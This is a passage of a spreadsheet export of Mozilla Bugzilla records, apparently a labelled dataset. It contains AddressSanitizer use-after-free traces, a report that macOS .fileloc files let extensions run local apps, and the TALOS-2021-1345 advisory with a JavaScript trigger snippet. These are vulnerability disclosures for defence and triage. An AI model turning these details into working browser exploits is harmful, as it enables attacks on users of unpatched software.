    #26 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #27 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #28 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #29 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #30 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #31 0x7ff2afb12d5d in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #32 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #33 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #34 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #35 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #36 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #37 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bbc8c in malloc /builds/worker/workspace/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed09d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7ff2afe723a6 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7ff2afe723a6 in NS_NewHTMLVideoElement(already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser) /builds/worker/workspace/build/src/dom/html/HTMLVideoElement.cpp:38
    #4 0x7ff2afec7c66 in CreateHTMLElement /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:392:41
    #5 0x7ff2afec7c66 in NS_NewHTMLElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsTSubstring&lt;char16_t&gt; const*, mozilla::dom::CustomElementDefinition*) /builds/worker/workspace/build/src/dom/html/nsHTMLContentSink.cpp:363
    #6 0x7ff2adcabdd5 in NS_NewElement(mozilla::dom::Element**, already_AddRefed&lt;mozilla::dom::NodeInfo&gt;&amp;&amp;, mozilla::dom::FromParser, nsTSubstring&lt;char16_t&gt; const*) /builds/worker/workspace/build/src/dom/base/nsNameSpaceManager.cpp:182:12
    #7 0x7ff2adb775f7 in nsDocument::CreateElementNS(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::dom::ElementCreationOptionsOrString const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:6143:8
    #8 0x7ff2af1539f4 in mozilla::dom::DocumentBinding::createElementNS(JSContext*, JS::Handle&lt;JSObject*&gt;, nsIDocument*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/DocumentBinding.cpp:1305:59
    #9 0x7ff2af6ec630 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #10 0x7ff2b5b88e60 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #11 0x7ff2b5b88e60 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #12 0x7ff2b5b7437b in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #13 0x7ff2b5b7437b in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3098
    #14 0x7ff2b5b5c43a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #15 0x7ff2b5b88f5f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #16 0x7ff2b5b89e52 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #17 0x7ff2b65ccd7b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3026:12
    #18 0x7ff2af10f335 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #19 0x7ff2afb12d5d in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #20 0x7ff2afb12d5d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #21 0x7ff2afadade6 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1117:51
    #22 0x7ff2afadcfb2 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1292:20
    #23 0x7ff2afabe2b1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #24 0x7ff2afac1782 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:826:9
    #25 0x7ff2b1e2e1de in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #26 0x7ff2b4ec70f1 in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7779:21
    #27 0x7ff2b4ec3114 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7577:7
    #28 0x7ff2b4eca9af in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7474:13
    #29 0x7ff2ac99b373 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1321:3
    #30 0x7ff2ac99a4dc in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:862:14
    #31 0x7ff2ac997568 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:751:9
    #32 0x7ff2ac999482 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:633:5
    #33 0x7ff2ac99a0dc in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:489:14
    #34 0x7ff2aaef4400 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:312:36 in operator!
Shadow bytes around the buggy address:
  0x0c348000bd10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c348000bd30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa
  0x0c348000bd40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c348000bd50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=&gt;0x0c348000bd60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd[fd]fd
  0x0c348000bd70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd80: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bd90: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bda0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c348000bdb0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd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24229==ABORTING</t>
        </is>
      </c>
      <c r="X6196" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6197">
      <c r="A6197" t="n">
        <v>372880</v>
      </c>
      <c r="B6197" t="inlineStr">
        <is>
          <t>2007-03-06 13:48:12 -0800</t>
        </is>
      </c>
      <c r="C6197" t="inlineStr">
        <is>
          <t>create and use version information templates</t>
        </is>
      </c>
      <c r="D6197" t="inlineStr">
        <is>
          <t>2012-12-28 15:39:13 -0800</t>
        </is>
      </c>
      <c r="E6197" t="n">
        <v>1</v>
      </c>
      <c r="F6197" t="n">
        <v>1</v>
      </c>
      <c r="G6197" t="n">
        <v>6</v>
      </c>
      <c r="H6197" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I6197" t="inlineStr">
        <is>
          <t>Developer Documentation Graveyard</t>
        </is>
      </c>
      <c r="J6197" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K6197" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6197" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6197" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6197" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6197" t="inlineStr"/>
      <c r="Q6197" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6197" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S6197" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6197" t="n">
        <v>1</v>
      </c>
      <c r="U6197" t="n">
        <v>0</v>
      </c>
      <c r="V6197" t="n">
        <v>4</v>
      </c>
      <c r="W6197" t="inlineStr">
        <is>
          <t>We should let the reader know if certain feature was available since version X of Firefox/the platform/JavaScript/etc. in a consistent way.
shaver suggested creating templates for this, and I think it's a good idea. The Firefox version of template could link to the corresponding "Firefox X for developers" page, like http://developer.mozilla.org/en/docs/Firefox_3_for_developers, same for JS links; the templates also could be used to automatically put a page in the "New in version X" category.
Reminder - these templates should be documented at http://developer.mozilla.org/en/docs/MDC:Custom_Templates</t>
        </is>
      </c>
      <c r="X6197" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6198">
      <c r="A6198" t="n">
        <v>1596668</v>
      </c>
      <c r="B6198" t="inlineStr">
        <is>
          <t>2019-11-14 23:11:26 -0800</t>
        </is>
      </c>
      <c r="C6198" t="inlineStr">
        <is>
          <t>Firefox for macOS: extensions with downloads.open permission can execute code on the device using .fileloc files</t>
        </is>
      </c>
      <c r="D6198" t="inlineStr">
        <is>
          <t>2024-05-30 10:04:41 -0700</t>
        </is>
      </c>
      <c r="E6198" t="n">
        <v>1</v>
      </c>
      <c r="F6198" t="n">
        <v>1</v>
      </c>
      <c r="G6198" t="n">
        <v>2</v>
      </c>
      <c r="H6198" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6198" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J6198" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K6198" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6198" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6198" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6198" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6198" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main73+] [adv-esr68.5+]</t>
        </is>
      </c>
      <c r="Q6198" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6198" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6198" t="inlineStr">
        <is>
          <t>Firefox 74</t>
        </is>
      </c>
      <c r="T6198" t="n">
        <v>1</v>
      </c>
      <c r="U6198" t="n">
        <v>0</v>
      </c>
      <c r="V6198" t="n">
        <v>45</v>
      </c>
      <c r="W6198" t="inlineStr">
        <is>
          <t>Created attachment 9108939
firefox-extension-fileloc.zip
FF Version: 70.0.1
macOS: 10.15.1 (19B88)
1. .fileloc files behave on macOS similarly to .url files on Windows - as shortcuts that can execute local apps.
2. A malicious extension with `downloads/downloads.open` permissions can download a .fileloc file + execute it to launch arbitrary local apps.
3. It looks like a non-secure feature of macOS(that I'm going to report), so it's not clear what'd be your opinion. I guess you'd like to add this file to your file handling mechanism as well.
PoC opens Calculator.app on Catalina.</t>
        </is>
      </c>
      <c r="X6198" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6199">
      <c r="A6199" t="n">
        <v>738985</v>
      </c>
      <c r="B6199" t="inlineStr">
        <is>
          <t>2012-03-24 13:21:36 -0700</t>
        </is>
      </c>
      <c r="C6199" t="inlineStr">
        <is>
          <t>heap-use-after-free at mozilla::dom::indexedDB::IDBKeyRange::cycleCollection::Trace</t>
        </is>
      </c>
      <c r="D6199" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:47 -0700</t>
        </is>
      </c>
      <c r="E6199" t="n">
        <v>1</v>
      </c>
      <c r="F6199" t="n">
        <v>1</v>
      </c>
      <c r="G6199" t="n">
        <v>3</v>
      </c>
      <c r="H6199" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6199" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6199" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K6199" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L6199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M6199" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N6199" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6199" t="inlineStr">
        <is>
          <t>[sg:critical][qa+:ashughes][asan]</t>
        </is>
      </c>
      <c r="Q6199" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6199" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S6199" t="inlineStr">
        <is>
          <t>mozilla14</t>
        </is>
      </c>
      <c r="T6199" t="n">
        <v>1</v>
      </c>
      <c r="U6199" t="n">
        <v>0</v>
      </c>
      <c r="V6199" t="n">
        <v>27</v>
      </c>
      <c r="W6199" t="inlineStr">
        <is>
          <t>Created attachment 609037
file to trigger the issue
ASan reports a heap-use-after-free error when the attached page is opened. The file was minimized against 14.0a1 (2012-03-24) and doesn't seem to reproduce anymore on 12.0, but similar files caused also it to crash during minimization. The trace was https://crash-stats.mozilla.com/report/index/bp-e750dc35-be93-426f-aff3-cd82b2120324
To reproduce, open idb.html in an ASan build and wait about 7 seconds.</t>
        </is>
      </c>
      <c r="X6199" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6200">
      <c r="A6200" t="n">
        <v>1722083</v>
      </c>
      <c r="B6200" t="inlineStr">
        <is>
          <t>2021-07-23 13:06:04 -0700</t>
        </is>
      </c>
      <c r="C6200" t="inlineStr">
        <is>
          <t>TALOS-2021-1345 - Mozilla Firefox MediaCacheStream::NotifyDataReceived use-after-free vulnerability</t>
        </is>
      </c>
      <c r="D6200" t="inlineStr">
        <is>
          <t>2022-08-26 17:52:34 -0700</t>
        </is>
      </c>
      <c r="E6200" t="n">
        <v>1</v>
      </c>
      <c r="F6200" t="n">
        <v>1</v>
      </c>
      <c r="G6200" t="n">
        <v>3</v>
      </c>
      <c r="H6200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6200" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6200" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K6200" t="inlineStr">
        <is>
          <t>Firefox 90</t>
        </is>
      </c>
      <c r="L6200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6200" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6200" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6200" t="inlineStr">
        <is>
          <t>[adv-main91+][adv-esr78.13+]</t>
        </is>
      </c>
      <c r="Q6200" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R6200" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S6200" t="inlineStr">
        <is>
          <t>92 Branch</t>
        </is>
      </c>
      <c r="T6200" t="n">
        <v>1</v>
      </c>
      <c r="U6200" t="n">
        <v>0</v>
      </c>
      <c r="V6200" t="n">
        <v>32</v>
      </c>
      <c r="W6200" t="inlineStr">
        <is>
          <t>Created attachment 9232904
UAF_StreamBuffering.zip
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Steps to reproduce:
None (published patch date) 
TALOS-2021-1345   
Mozilla Firefox MediaCacheStream::NotifyDataReceived use-after-free vulnerability
### Summary
An potential remote code execution vulnerability exists in the MediaCacheStream::NotifyDataReceived method of Mozilla Firefox 89.0.3 x64.  A specially crafted web page can cause a use-after-free vulnerability potentially resulting in a code execution. A victim needs to visit a malicious webpage to trigger this vulnerability.
### Tested Versions
Mozilla Firefox Mozilla Firefox 89.0.3 x64   
### Product URLs
[https://www.mozilla.org/en-US/firefox/new](https://www.mozilla.org/en-US/firefox/new)
### CVSSv3 Score
8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
### CWE
CWE-416 - Use After Free
### Details
Mozilla Firefox is one of the most popular web browsers on the world available for a variety of the different platforms : Windows, Linux, OSX, Android and more. Its active development ensure support for the newest web technologies like HTML5 or CSS3.
This vulnerability is related with the `nsBufferedStream` component which is part of the `Stream buffering` functionality.
A malicious web page can lead to a race condition situation which can cause a use-after-free vulnerability and potential remote code execution.
Tracking an `nsBufferedStream` object life cycle we can notice that there is an allocation made :
	previously allocated by thread T0 (Web Content) here:
		#0 0x55eb6b69ca7d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3
		#1 0x7f031b4f9e2e in operator new[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:47:10
		#2 0x7f031b4f9e2e in nsBufferedStream::Init(nsISupports*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:73:13
		#3 0x7f031b4fc05c in nsBufferedInputStream::Init(nsIInputStream*, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:335:35
		#4 0x7f031b5303ba in NS_NewBufferedInputStream(nsIInputStream**, already_AddRefed&lt;nsIInputStream&gt;, unsigned int) /builds/worker/checkouts/gecko/netwerk/base/nsNetUtil.cpp:1330:14
		#5 0x7f031b52c483 in nsInputStreamPump::CreateBufferedStreamIfNeeded() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:672:17
		#6 0x7f031b52c0c8 in nsInputStreamPump::PeekStream(void (*)(void*, unsigned char const*, unsigned int), void*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:94:17
		#7 0x7f031b4ed088 in nsBaseChannel::OnStartRequest(nsIRequest*) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:827:14
		#8 0x7f031b52ec0e in nsInputStreamPump::OnStateStart() /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:481:21
		#9 0x7f031b52e337 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:390:21
		#10 0x7f03208e4d63 in mozilla::dom::BlobURLInputStream::OnInputStreamReady(nsIAsyncInputStream*) /builds/worker/checkouts/gecko/dom/file/uri/BlobURLInputStream.cpp:271:20
		#11 0x7f03208d8f84 in mozilla::(anonymous namespace)::InputStreamCallbackRunnable::Run() /builds/worker/checkouts/gecko/dom/file/ipc/RemoteLazyInputStream.cpp:54:16
		#12 0x7f031b2439cc in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/checkouts/gecko/xpcom/threads/SchedulerGroup.cpp:143:20
		#13 0x7f031b24d16a in mozilla::RunnableTask::Run() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:473:16
		#14 0x7f031b24a4f8 in mozilla::TaskController::DoExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:757:26
		#15 0x7f031b248837 in mozilla::TaskController::ExecuteNextTaskOnlyMainThreadInternal(mozilla::detail::BaseAutoLock&lt;mozilla::Mutex&amp;&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:612:15
		#16 0x7f031b248c8d in mozilla::TaskController::ProcessPendingMTTask(bool) /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:396:36
		#17 0x7f031b253471 in operator() /builds/worker/checkouts/gecko/xpcom/threads/TaskController.cpp:135:37
		#18 0x7f031b253471 in mozilla::detail::RunnableFunction&lt;mozilla::TaskController::InitializeInternal()::$_3&gt;::Run() /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.h:534:5
		#19 0x7f031b26cb31 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1155:16
		#20 0x7f031b27649c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:548:10
		#21 0x7f031c44968f in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:87:21
Which is caused by a call to `URL.createObjectURL` inside the `MediaRecorder_onstop` event handler:
	Line 1	function MediaRecorder_onstop(e)
	Line 2	{
	Line 3		let blob = new Blob(chunks,{ 'type' : 'audio/ogg; codecs=opus' });
	Line 4		audioElement.src = URL.createObjectURL(blob);
	Line 5		audioElement.play(); 
	Line 6	}	
Further this `nsBufferedStream` object gets deallocated:
	0x62100323e900 is located 0 bytes inside of 4096-byte region [0x62100323e900,0x62100323f900)
	freed by thread T0 (Web Content) here:
		#0 0x55eb6b69c7fd in free /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:123:3
		#1 0x7f031b4f9bbd in operator delete[] /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:60:10
		#2 0x7f031b4f9bbd in nsBufferedStream::Close() /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:84:5
		#3 0x7f031b4fec52 in Close /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:391:21
		#4 0x7f031b4fec52 in CloseWithStatus /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp:671:67
		#5 0x7f031b4fec52 in non-virtual thunk to nsBufferedInputStream::CloseWithStatus(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBufferedStreams.cpp
		#6 0x7f031b52d41d in nsInputStreamPump::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsInputStreamPump.cpp:210:19
		#7 0x7f031b4e9618 in nsBaseChannel::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp:399:15
		#8 0x7f031b4e968c in non-virtual thunk to nsBaseChannel::Cancel(nsresult) /builds/worker/checkouts/gecko/netwerk/base/nsBaseChannel.cpp
		#9 0x7f0320bec2bd in mozilla::ChannelMediaResource::CloseChannel() /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:631:15
		#10 0x7f0320befe92 in mozilla::ChannelMediaResource::Close() /builds/worker/checkouts/gecko/dom/media/ChannelMediaResource.cpp:575:5
		#11 0x7f0320be55ef in mozilla::ChannelMediaDecoder::Shutdown() /builds/worker/checkouts/gecko/dom/media/ChannelMediaDecoder.cpp:224:40
		#12 0x7f0320a2d7c0 in mozilla::dom::HTMLMediaElement::ShutdownDecoder() /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:2206:13
		#13 0x7f0320a4ba06 in mozilla::dom::HTMLMediaElement::~HTMLMediaElement() /builds/worker/checkouts/gecko/dom/html/HTMLMediaElement.cpp:4208:5
		#14 0x7f032097ca0d in mozilla::dom::HTMLAudioElement::~HTMLAudioElement() /builds/worker/checkouts/gecko/dom/html/HTMLAudioElement.cpp:58:1
		#15 0x7f031e5e92fd in nsIContent::Destroy() /builds/worker/checkouts/gecko/dom/base/FragmentOrElement.cpp:150:1
		#16 0x7f031b0bef72 in SnowWhiteKiller::~SnowWhiteKiller() /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2417:7
		#17 0x7f031b0bd73b in nsPurpleBuffer::RemoveSkippable(nsCycleCollector*, js::SliceBudget&amp;, bool, bool, void (*)()) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2585:1
		#18 0x7f031b0bf79f in nsCycleCollector::ForgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:2653:14
		#19 0x7f031b0c7f6d in nsCycleCollector_forgetSkippable(js::SliceBudget&amp;, bool, bool) /builds/worker/checkouts/gecko/xpcom/base/nsCycleCollector.cpp:3865:21
		#20 0x7f031e816e79 in FireForgetSkippable(bool, mozilla::TimeStamp) /builds/worker/checkouts/gecko/dom/base/nsJSEnvironment.cpp:1141:3
		#21 0x7f031e81831c in CCRunnerFired(mozilla::TimeStamp) /builds/worker/checkouts/gecko/dom/base/nsJSEnvironment.cpp:1644:9
